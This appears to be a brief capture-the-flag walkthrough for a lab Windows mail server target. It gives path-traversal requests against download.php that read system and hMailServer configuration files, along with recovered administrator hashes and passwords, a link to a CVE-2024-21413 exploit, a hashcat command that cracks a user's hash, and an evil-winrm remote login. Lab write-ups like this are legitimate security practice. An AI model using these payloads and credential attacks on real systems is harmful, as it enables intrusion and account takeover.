Foothold

GET /download.php?file=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
GET /download.php?file=../../../../../../../../Program+Files+(x86)/hMailServer/Bin/hmailServer.ini

Administrator:841bb5acfa6779ae432fd7a4e6600ba7
0a9f8ad8bf896b501dde74f08efd7e4c
Administrator:homenetworkingadministrator

Struggled to find a foothold until stumbling upon this

https://github.com/CMNatic/CVE-2024-21413/tree/main

hashcat -m 5600 maya.hash ~/rockyou.txt -O  
maya:m4y4ngs4ri
 evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri -s ~/opt/wpe

Last updated

Was this helpful?